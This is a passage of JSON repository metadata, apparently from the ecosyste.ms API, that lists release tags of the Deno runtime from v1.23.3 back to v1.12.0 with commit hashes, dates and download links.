thub.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":n